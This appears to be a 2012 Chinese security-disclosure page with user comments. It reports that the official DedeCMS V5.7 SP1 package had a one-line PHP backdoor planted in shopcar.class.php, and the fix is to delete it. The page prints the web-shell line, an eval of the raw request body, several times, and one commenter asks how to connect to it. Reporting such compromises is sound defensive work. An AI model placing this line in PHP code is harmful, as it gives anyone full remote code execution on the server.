漏洞概要
关注数(14)
关注此漏洞
漏洞标题: Dedecms疑似被植入后门
提交时间: 2012-03-20 19:30
公开时间: 2012-03-20 19:30
漏洞类型: 成功的入侵事件
危害等级: 高
自评Rank: 10
漏洞状态:
未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门
前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
修复方案:
删除@eval(file_get_contents('php://input'));
漏洞回应
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
评价
-
2012-03-20 19:45 |
xsser
( 普通白帽子 |
Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
1
-
2012-03-20 19:46 |
zhuowater
( 路人 |
Rank:15 漏洞数:2 | 程序员一枚,求妹子一枚)
0
-
2012-03-20 19:50 |
xsser
( 普通白帽子 |
Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
1
@zhuowater 是之前的问题都忽略了 这个问题还是公众提前知道好
-
2012-03-20 21:21 |
yeweit6
( 实习白帽子 |
Rank:32 漏洞数:7 | 豫章故郡,洪都新府。星分翼轸,地接衡庐。...)
1
-
2012-03-21 10:31 |
Z-0ne
( 普通白帽子 |
Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)
0
-
2012-03-21 11:02 |
icefish
( 普通白帽子 |
Rank:104 漏洞数:8 | 欢迎大家和我用邮件进行交流~)
0
-
2012-03-21 11:06 |
horseluke
( 普通白帽子 |
Rank:116 漏洞数:18 | Realize the dream in earnest.)
0
-
2012-03-21 11:09 |
xsser
( 普通白帽子 |
Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0
-
2012-03-21 13:25 |
08fans
( 路人 |
Rank:24 漏洞数:6 | 关注网络安全)
0
果断测试成功。。。
http://1.honglousy.sinaapp.com/archives/45
-
2012-03-21 14:57 |
小雨
( 普通白帽子 |
Rank:105 漏洞数:19 | phper)
0
-
2012-03-21 17:38 |
GaRY
( 实习白帽子 |
Rank:39 漏洞数:3 | 真悲剧平男君)
2
这个问题可以质疑一下厂家的态度,怎么能简单忽略了事?
-
2013-08-08 16:47 |
j2ck3r
( 普通白帽子 |
Rank:424 漏洞数:98 | 别关注我,跟你不熟。)
3
@eval(file_get_contents('php://input')); 这后门怎么连接